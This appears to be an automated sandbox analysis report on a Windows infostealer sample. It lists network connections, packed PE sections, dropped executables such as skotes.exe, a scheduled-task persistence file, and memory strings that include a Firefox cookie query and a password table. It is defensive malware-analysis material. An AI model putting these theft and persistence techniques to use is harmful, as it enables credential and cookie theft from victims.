Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012

Source: unknown	HTTPS traffic detected: 20.190.177.146:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.35.26:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.6:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.16.158.83:443 -> 192.168.2.6:49879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.6:49965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:50068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:50092 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: DocumentsDBKKKEHDHC.exe.0.dr	Static PE information: section name:
Source: DocumentsDBKKKEHDHC.exe.0.dr	Static PE information: section name: .idata
Source: DocumentsDBKKKEHDHC.exe.0.dr	Static PE information: section name:
Source: skotes.exe.27.dr	Static PE information: section name:
Source: skotes.exe.27.dr	Static PE information: section name: .idata
Source: skotes.exe.27.dr	Static PE information: section name:
Source: random[1].exe.32.dr	Static PE information: section name:
Source: random[1].exe.32.dr	Static PE information: section name: .rsrc
Source: random[1].exe.32.dr	Static PE information: section name: .idata
Source: random[1].exe.32.dr	Static PE information: section name:
Source: cc0a932c85.exe.32.dr	Static PE information: section name:
Source: cc0a932c85.exe.32.dr	Static PE information: section name: .rsrc
Source: cc0a932c85.exe.32.dr	Static PE information: section name: .idata
Source: cc0a932c85.exe.32.dr	Static PE information: section name:

Source: C:\Users\user\DocumentsDBKKKEHDHC.exe

File created: C:\Windows\Tasks\skotes.job

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA2ECC0	0_2_6CA2ECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA8ECD0	0_2_6CA8ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0AC30	0_2_6CB0AC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF6C00	0_2_6CAF6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA3AC60	0_2_6CA3AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA34DB0	0_2_6CA34DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAC6D90	0_2_6CAC6D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBCDC0	0_2_6CBBCDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB8D20	0_2_6CBB8D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAFED70	0_2_6CAFED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5AD50	0_2_6CB5AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAB6E90	0_2_6CAB6E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA3AEC0	0_2_6CA3AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD0EC0	0_2_6CAD0EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB10E20	0_2_6CB10E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CACEE70	0_2_6CACEE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB78FB0	0_2_6CB78FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA3EFB0	0_2_6CA3EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0EFF0	0_2_6CB0EFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA30FE0	0_2_6CA30FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB70F20	0_2_6CB70F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA36F10	0_2_6CA36F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF2F70	0_2_6CAF2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA9EF40	0_2_6CA9EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB368E0	0_2_6CB368E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA80820	0_2_6CA80820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CABA820	0_2_6CABA820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB04840	0_2_6CB04840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAC09A0	0_2_6CAC09A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAEA9A0	0_2_6CAEA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF09B0	0_2_6CAF09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4C9E0	0_2_6CB4C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA649F0	0_2_6CA649F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA86900	0_2_6CA86900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA68960	0_2_6CA68960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAAEA80	0_2_6CAAEA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE8A30	0_2_6CAE8A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADEA00	0_2_6CADEA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAACA70	0_2_6CAACA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD0BA0	0_2_6CAD0BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB36BE0	0_2_6CB36BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5A480	0_2_6CB5A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA764D0	0_2_6CA764D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CACA4D0	0_2_6CACA4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA94420	0_2_6CA94420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CABA430	0_2_6CABA430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA48460	0_2_6CA48460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA245B0	0_2_6CA245B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAFA5E0	0_2_6CAFA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CABE5F0	0_2_6CABE5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA92560	0_2_6CA92560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD0570	0_2_6CAD0570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB78550	0_2_6CB78550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA88540	0_2_6CA88540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB34540	0_2_6CB34540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA8E6E0	0_2_6CA8E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CACE6E0	0_2_6CACE6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA546D0	0_2_6CA546D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA8C650	0_2_6CA8C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA5A7D0	0_2_6CA5A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAB0700	0_2_6CAB0700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0C0B0	0_2_6CB0C0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA400B0	0_2_6CA400B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA28090	0_2_6CA28090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAFC000	0_2_6CAFC000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF8010	0_2_6CAF8010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA7E070	0_2_6CA7E070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA301E0	0_2_6CA301E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB14130	0_2_6CB14130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAA6130	0_2_6CAA6130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA98140	0_2_6CA98140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB022A0	0_2_6CB022A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAFE2B0	0_2_6CAFE2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB62C0	0_2_6CBB62C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB08220	0_2_6CB08220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAFA210	0_2_6CAFA210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAB8260	0_2_6CAB8260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAC8250	0_2_6CAC8250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA623A0	0_2_6CA623A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA8E3B0	0_2_6CA8E3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA843E0	0_2_6CA843E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAA2320	0_2_6CAA2320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB72370	0_2_6CB72370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA32370	0_2_6CA32370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4C360	0_2_6CB4C360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAC6370	0_2_6CAC6370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA38340	0_2_6CA38340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CACFC80	0_2_6CACFC80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF1CE0	0_2_6CAF1CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB6DCD0	0_2_6CB6DCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA41C30	0_2_6CA41C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA33C40	0_2_6CA33C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB59C40	0_2_6CB59C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA23D80	0_2_6CA23D80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB79D90	0_2_6CB79D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB01DC0	0_2_6CB01DC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA93D00	0_2_6CA93D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA53EC0	0_2_6CA53EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB3DE10	0_2_6CB3DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8BE70	0_2_6CB8BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB5E60	0_2_6CBB5E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA51F90	0_2_6CA51F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADBFF0	0_2_6CADBFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4DFC0	0_2_6CB4DFC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB3FC0	0_2_6CBB3FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA65F20	0_2_6CA65F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA25F30	0_2_6CA25F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB87F20	0_2_6CB87F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0F8F0	0_2_6CB0F8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA3D8E0	0_2_6CA3D8E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA638E0	0_2_6CA638E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8B8F0	0_2_6CB8B8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CACF8C0	0_2_6CACF8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA8D810	0_2_6CA8D810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB01990	0_2_6CB01990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA41980	0_2_6CA41980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA959F0	0_2_6CA959F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAC79F0	0_2_6CAC79F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAC99C0	0_2_6CAC99C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA699D0	0_2_6CA699D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE5920	0_2_6CAE5920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7F900	0_2_6CB7F900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAAF960	0_2_6CAAF960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAED960	0_2_6CAED960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0DAB0	0_2_6CB0DAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA31AE0	0_2_6CA31AE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB2DA30	0_2_6CB2DA30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA6FA10	0_2_6CA6FA10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD1A10	0_2_6CAD1A10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB9A50	0_2_6CBB9A50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA89BA0	0_2_6CA89BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF9BB0	0_2_6CAF9BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB15B90	0_2_6CB15B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA21B80	0_2_6CA21B80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA77BF0	0_2_6CA77BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA7BB20	0_2_6CA7BB20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0FB60	0_2_6CB0FB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB14A0	0_2_6CBB14A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA314E0	0_2_6CA314E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB19430	0_2_6CB19430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CABD410	0_2_6CABD410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA69590	0_2_6CA69590
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAB55F0	0_2_6CAB55F0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00A6E530	32_2_00A6E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00AA78BB	32_2_00AA78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00AA8860	32_2_00AA8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00AA7049	32_2_00AA7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00AA31A8	32_2_00AA31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00A64DE0	32_2_00A64DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00AA2D10	32_2_00AA2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00AA779B	32_2_00AA779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00A64B30	32_2_00A64B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00A97F36	32_2_00A97F36

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CBBDAE0 appears 76 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CA59B10 appears 99 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CBB09D0 appears 317 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CA53620 appears 95 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CA8C5E0 appears 35 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CBBD930 appears 60 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB69F30 appears 52 times

Source: cc0a932c85.exe.32.dr	Static PE information: No import functions for PE file found
Source: random[1].exe.32.dr	Static PE information: No import functions for PE file found

Source: cc0a932c85.exe.32.dr	Static PE information: Data appended to the last section found
Source: random[1].exe.32.dr	Static PE information: Data appended to the last section found

Source: file.exe, 00000000.00000002.2749374142.00000000733D2000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2744608109.0000000023737000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
Source: file.exe, 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: dpgvilua ZLIB complexity 0.9945306581439394
Source: random[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.9982650715258855
Source: random[1].exe.0.dr	Static PE information: Section: zmgocjct ZLIB complexity 0.9948031085237259
Source: DocumentsDBKKKEHDHC.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9982650715258855
Source: DocumentsDBKKKEHDHC.exe.0.dr	Static PE information: Section: zmgocjct ZLIB complexity 0.9948031085237259
Source: skotes.exe.27.dr	Static PE information: Section: ZLIB complexity 0.9982650715258855
Source: skotes.exe.27.dr	Static PE information: Section: zmgocjct ZLIB complexity 0.9948031085237259

Source: DocumentsDBKKKEHDHC.exe.0.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe.0.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.27.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@75/296@27/29

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CA90300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6CA90300

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\A4NNMDLS.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8988:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\ba376185-15ce-41ed-b868-e4e167ba0d46.tmp

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2748343348.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2740856588.000000001D5BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2748343348.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2740856588.000000001D5BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2748343348.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2740856588.000000001D5BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2748343348.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2740856588.000000001D5BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2720777420.000000000109E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;
Source: file.exe, file.exe, 00000000.00000002.2748343348.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2740856588.000000001D5BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2748343348.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2740856588.000000001D5BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2748343348.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2740856588.000000001D5BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2456512276.000000001D4AD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361055281.000000001D4B9000.00000004.00000020.00020000.00000000.sdmp, IECBAFCAAKJDHJKFIEBG.0.dr, BGCAFHCAKFBFIECAFIIJ.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2748343348.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2740856588.000000001D5BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2748343348.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2740856588.000000001D5BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
